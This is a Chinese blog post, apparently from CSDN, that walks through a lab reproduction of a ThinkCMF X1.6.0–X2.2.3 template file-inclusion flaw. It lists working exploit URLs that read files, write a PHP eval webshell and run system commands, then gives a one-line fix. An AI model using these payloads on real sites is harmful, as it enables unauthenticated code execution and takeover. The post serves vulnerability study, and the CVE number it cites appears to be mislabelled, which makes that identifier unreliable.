thinkcmf 文件包含 x1.6.0-x2.2.3 已亲自复现

最新推荐文章于 2024-01-22 14:15:40 发布
最新推荐文章于 2024-01-22 14:15:40 发布
阅读量726 收藏 7
点赞数 16
分类专栏: thinkcmf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135253652
版权

thinkcmf 文件包含 x1.6.0-x2.2.3 CVE-2019-16278 已亲自复现

漏洞名称

漏洞描述

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。

远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。

影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2

漏洞复现

环境搭建

受害者IP:192.168.63.129:9390
攻击者IP:192.168.63.1

vulfocus下载链接

https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

docker-compose up -d

环境启动后,访问http://192.168.63.129:9390即可看到一个thinkphp页面,说明已成功启动。

漏洞利用

直接干货,不墨迹

/?a=display&templateFile=README.md

在这里插入图片描述

/?a=display&templateFile=config.yaml

在这里插入图片描述

写入phpinfo文件

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>

在这里插入图片描述

访问1.php

在这里插入图片描述

写入一句话木马,2.php

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('2.php','<?php eval($_GET["red"]);?>')</php>

在这里插入图片描述

访问2.php执行系统命令

/2.php?red=system("ls /tmp");
/2.php?red=system(id);
/2.php?red=system(whoami);

在这里插入图片描述

修复建议

将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected

总结

Bolgzhang
关注
  • 16
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkCMF框架任意文件包含 漏洞复现
偷一个月亮
03-16 1021
0x01 简介 ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 但是由于代码漏洞,可以构造恶意url造成文件包含/上传漏洞。 0x02 漏洞版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkC...
【漏洞复现-thinkcmf-文件包含vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1560
【thinkcmf-文件包含】public函数
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 827
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
thinkcmf文件包含x1.6.0-x2.2.3漏洞复现
YouthBelief的博客
05-10 1086
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf文件包含x1.6.0-x2.2.3thinkcmf文件包含x1.6.0-x2.2.30x01 漏洞描述0x02 影响范围0x03 漏洞复现3.0 包含readme3.1 phpinfo3.2 webshell3.3 system0x04 漏洞修复 thinkcmf文件包含x1.6.0-x2.2.3 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框
ThinkCMF文件包含x1.6.0-x2.2.3
最新发布
m0_65150886的博客
01-22 433
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。
PCL-1.6.0-AllInOne-msvc2010-win64.part1.rar
04-09
日常分享:pcl是功能强大的三维点云处理库,资源为1.6版本,可直接安装,自带64位debug/release动静态链接库和第三方库,适用于VS2010。
Flume-ng-1.6.0-cdh.zip
04-08
Flume-ng-1.6.0-cdh.zip 内压缩了 3 个项目,分别为:flume-ng-1.6.0-cdh5.5.0.tar.gz、flume-ng-1.6.0-cdh5.7.0.tar.gz 和 flume-ng-1.6.0-cdh5.10.1.tar.gz,选择你需要的版本。
tree-1.6.0-10.el7.x86_64.rpm
04-17
tree 命令英文理解为树的意思,其功能是是创建文件列表,将目录所有文件以树状的形式列出来。是一款在颜值上优先于ls的命令。本次上传的安装包适用于红帽7、centOS7 linux中的tree命令默认并不会安装, [root@...
torch-1.6.0-cp36-cp36m-linux_aarch64.whl
08-04
官网提供了下载地址:https://forums.developer.nvidia.com/t/pytorch-for-jetson-nano-version-1-5-0-now-available/72048,我这边下载好上传到csdn。
hbase-1.6.0-bin.tar.gz
10-17
HBase1.6.0安装包
ThinkCMFX2.2.3_20161213.zip
01-23
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展,每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 ThinkCMFX 2.2.3 更新日志:2016-12-13 * 修复后台部分浏览器无法上传问题; * 优化chrome 上传文件时,打开文件选择框慢; * 修复后台文件添加编辑相册图片移除浏览器不兼容问题; * 修复文件上传在遨游下不能上传文件问题; * 修复后台登录错误时提示无样式。
ThinkCMFX1.6.0 用户手册
08-17
ThinkCMF完全开发手册通过在线手册http://www.thinkcmf.com/document/index.html 编译生成,内容和在线手册一致。 官网会定期编译生成供大家下载使用,请关注官网最新资讯
ThinkCMF 任意文件包含漏洞复现
weixin_43740200的博客
11-15 859
这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。 搭建环境,放到服务器上。 先来试试读取README文件 http://127.0.0.1/?a=display&templateFile=REMADE.md kn1feemmm,好使,再来读读系统文件 http://127.0.0.1/?a=display&templateFile=/etc/pa...
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1187
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1609
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
thinkcmfx漏洞太大_Thinkcmf任意漏洞包含漏洞分析复现
weixin_39584529的博客
12-30 152
简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协...
ThinkCMFX文件包含漏洞
冠霖L的博客
11-03 1959
0x00 漏洞简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,从而能够达到远程代码执行 0x01 影响范围 1.6.0 < ThinkCMFX < 2.3.0 0x02 环境搭建 使用ThinkCMFX2.2.0版本搭建,利用中间件phpstudy运行搭建的网站,网站一键安装即可 ...
ThinkCMF 框架上的任意内容包含漏洞
Sylon的博客
10-25 4424
0x01 背景 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又...
tree-1.6.0-10.el7.x86_64.rpm包下载
01-15
tree-1.6.0-10.el7.x86_64.rpm是一个用于Linux操作系统的软件包。如果您需要下载这个软件包,首先需要找到一个可信赖的软件源或官方网站。之后,在终端或命令行中使用wget或curl等命令来下载这个软件包。下载完成后,您可以使用rpm命令来安装这个软件包。首先使用rpm -ivh tree-1.6.0-10.el7.x86_64.rpm命令来安装,如果需要卸载可以使用rpm -e tree-1.6.0-10.el7.x86_64.rpm来进行卸载。安装完成后,您就可以在系统中使用tree命令来浏览文件和目录的树形结构了。在使用rpm安装软件包时,可能会出现依赖性的问题,您需要根据系统提示来解决这些问题。安装完成后,建议您对软件进行检查和测试,确保安装成功并且可以正常运行。希望这些信息对您有所帮助,祝您顺利下载并使用tree-1.6.0-10.el7.x86_64.rpm软件包。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值